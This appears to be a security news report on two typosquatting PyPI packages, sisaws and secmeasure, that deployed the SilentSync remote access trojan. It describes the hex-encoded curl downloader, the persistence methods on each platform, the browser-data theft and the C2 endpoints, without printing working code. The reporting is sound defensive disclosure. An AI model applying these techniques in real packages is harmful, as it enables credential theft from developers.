Cybersecurity researchers have recently identified two malicious packages within the Python Package Index (PyPI) repository, designed to deploy a remote access trojan (RAT) named SilentSync on Windows systems. This discovery underscores the escalating threat of supply chain attacks targeting software developers.
SilentSync is a sophisticated malware capable of executing remote commands, exfiltrating files, and capturing screenshots. Additionally, it extracts sensitive data from web browsers—including credentials, browsing history, autofill information, and cookies—from popular browsers such as Chrome, Brave, Edge, and Firefox.
The two malicious packages, uploaded by a user identified as CondeTGAPIS, have since been removed from PyPI. They are:
– sisaws: 201 downloads
– secmeasure: 627 downloads
The sisaws package was crafted to mimic the legitimate sisa package associated with Argentina’s national health information system, Sistema Integrado de Información Sanitaria Argentino (SISA). Within its initialization script (`__init__.py`), a function named `gen_token()` serves as a downloader for subsequent malware stages. When invoked, this function sends a hard-coded token and receives a secondary static token in return, emulating the behavior of the genuine SISA API.
Upon execution, the `gen_token()` function decodes a hexadecimal string to reveal a curl command, which fetches an additional Python script from PasteBin. This script is saved as helper.py in a temporary directory and executed, facilitating the next phase of the attack.
Similarly, the secmeasure package masquerades as a library for string cleaning and security measures but contains embedded functionality to deploy the SilentSync RAT.
While SilentSync primarily targets Windows systems, it possesses built-in capabilities for Linux and macOS platforms. On Windows, it modifies the Registry; on Linux, it alters the crontab file to ensure payload execution at startup; and on macOS, it registers a LaunchAgent.
The malware communicates with a command-and-control (C2) server at the hard-coded IP address 200.58.107[.]25, utilizing four distinct endpoints:
– `/checkin`: Verifies connectivity
– `/comando`: Requests commands for execution
– `/respuesta`: Sends status messages
– `/archivo`: Transmits command outputs or stolen data
SilentSync’s capabilities include harvesting browser data, executing shell commands, capturing screenshots, and stealing files. It can exfiltrate entire directories as ZIP archives. To evade detection, the malware deletes all artifacts from the host after data transmission.
This incident highlights the growing risk of supply chain attacks within public software repositories. By employing typosquatting and impersonating legitimate packages, threat actors can infiltrate systems and access personally identifiable information (PII).
